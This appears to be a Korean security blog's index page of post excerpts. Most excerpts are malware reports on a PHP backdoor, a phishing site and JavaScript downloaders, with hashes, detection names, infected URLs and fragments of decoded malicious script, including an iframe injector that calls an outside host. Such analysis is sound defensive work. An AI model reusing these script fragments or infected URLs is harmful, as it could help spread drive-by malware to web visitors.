본문 바로가기

security

Gzinflate Base64 이용한 PHP Shell File : input.jpg MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b 크기 : 5.93KB (6,079 바이트) 감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg Kaspersky : Backdoor.PHP.Pbot.bl VirusTotal : 바이러스토탈결과 더보기
alyackorea.com 로 위장한 피싱 사이트 ! File : CAA7EF2L ,CAA7EF2L.(숨김파일) MD5 : 87514e109381faa98b50f426dd37f015 CAA7EF2L MD5 : 87514e109381faa98b50f426dd37f015 CAA7EF2L. (숨김파일) 크기 : 88.6KB (90,752 바이트) 88.6KB (90,752 바이트) (숨김파일) 감염 사이트 : http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe Kaspersky : HEUR:Trojan-Downloader.Win32.Generic VirusTotal : http://www.virustotal.com/file-scan/report.html?id=b8aed1eac332adada69d77256144.. 더보기
http://78xxk.com/java.html (Trojan-Downloader.JS.Agent.gm) File : java.html MD5 : 66a3a0be5fc181f1a9379a9a696c0928크기 : 2.98KB (3,058 바이트) 감염 사이트 : http://78xxk.com/java.html Kaspersky : Trojan-Downloader.JS.Agent.gm VirusTotal : http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327 function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i>4) {case 0:c.. 더보기
네이버 카스퍼스키 (HEUR:Trojan.Script.Iframer) 진단 사이트 보기 !! * 네이버 어느 페이지에서 감염되었는지는 모르겠다는걸 알려 드립니다! 최초 진단 사이트 : HEUR:Trojan.Script.Iframer (카스퍼스키) 링크 : http://n37.nsmartad.com/imp?slot=3451&ads=57314&tid=1&type=as document.write("OK"); var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cooki.. 더보기
Virus Bulletin 국내업체 비교 : VB100 Compare Vendors 최근 4번의 테스트 비교를 해보았습니다~ AhnLab Test History : 17 Pass, 12 Fail (58%) from February 2003 ESTsoft ALYac Test History : 1 Pass, 0 Fail (100%) from October 2011 SGA (VirusChaser) Test History : 7 Pass, 7 Fail (50%) from February 2003 Hauri (ViRobot) Test History : 1 Pass, 15 Fail (06%) from February 2001 Test Product Result October 2011 Windows Server 2003 AhnLab V3Net ESTsoft ALYac SGA (VirusChaser).. 더보기
Decode Base 64 를 이용한 악성 스크립트! File : f1.html MD5 : bce75d05869be9fdf489d13630bab1f1크기 : 8.67KB (8,879 바이트) 감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html Kaspersky : Exploit.JS.Agent.akr VirusTotal : http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379 원본 코드 var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+.. 더보기
File : rst46815.htm , MD5 52060d2944fa64d564f0ac4dfbd83c56 Script ! File : rst46815.htm MD5 : 52060d2944fa64d564f0ac4dfbd83c56크기 : 3.71KB (3,806 바이트) 감염 사이트 : http://bydbest.com/xxx/rst46815.htm Kaspersky : Trojan-Downloader.JS.Iframe.ciq Free dating, Friendship, sms [Script 해독] if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(" "); } function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src', 'http://neot.. 더보기
[Sophos Labs] 여러분의 Gmail 계정 해킹을 막는 방법 출처 : Sophos Labs 원본 : 바로가기 널리 보도된 바와 같이, Gmail을 사용하는 고위직 사용자 즉, 미 정부관리, 기자, 정치인들, 그들의 이메일 계정이 해킹되었습니다. 이것은 Google시스템에 대한 정교한 공격이라기 보다, 오히려 Gmail 피싱 페이지를 가리키는 정교하게 만들어진 HTML 이메일입니다. 희생자들은 첨부파일을 받아서 그 링크를 클릭하자 Gmail의 로그인 화면이 그들을 반겼다고 생각할 것입니다. 여러분이 그것을 알기 전에, 여러분의 Gmail 사용자명과 비밀번호는 공인되지 않은 조직의 손에 넘어갔을 수도 있습니다. So, what steps should you take to reduce the chances of your Gmail account being hacked?.. 더보기
[Sophos Labs] 님다 바이러스의 추억 출처 : Sophos Labs 원본 : 바로가기 이번 주는 악명 높게 퍼져나간 님다(Nimda) 바이러스의 10주년 되는 주입니다. 이번 기사에서, 우리는 그 발발 당시를 되짚어봅니다. 어쨌든, 미국 철학자 조지 산타야나(George Santayana)가 100여 년 전에 경고했듯이, “과거를 기억할 수 없는 사람들은 그것을 반복하여 비난을 받습니다.” 님다 바이러스는 2001년 9월 18일에 처음으로 나타났습니다. 그 바이러스는 의기양양한 시기를 보냈습니다. 그 코드 레드(Code Red) 웜 바이러스는 웜 재배포 전용의 대량네트워크 트래픽과 같은 부수적인 피해로 모든 사람들을 놀라게 하며 7월에 나타났었습니다. 마이크로소프트의 “휘슬러(Whistler)” 프로젝트는 8월에 Windows XP로 제조되.. 더보기
Zone-H.kr 이란! zone-h.kr 에 등록된 목록은 해외사이트에서 5분간격으로 자동 수집됩니다. 도메인이 등록되었다고 모두 해킹을 당한것은 아닙니다. 등록된 도메인은 해외해커에 의해 취약점이 노출되었다고 볼순 있지만 오탐,시도실패등 여러가지 이유로 잘못 등록된 사이트도 있으므로 100% 신뢰할수 없습니다. Q. zone-h.kr 은 어떤 조직입니까 ? zone-h.kr 은 특정단체나 기업이 소유하고 있는곳이 아닙니다. 개인소유이며 개인이 운영하는 사이트입니다. whois.kr 에서 zone-h.kr 도메인 검색을 해보시기 바랍니다. Q. 어떤방식으로 데이타를 수집하고 있습니까? zone-h.org 와 같은 해외 사이트에서 자동으로 데이타를 수집합니다. 일부도메인은 검색엔진(구글..)에서 검색하기도 합니다. Q.해킹리스트.. 더보기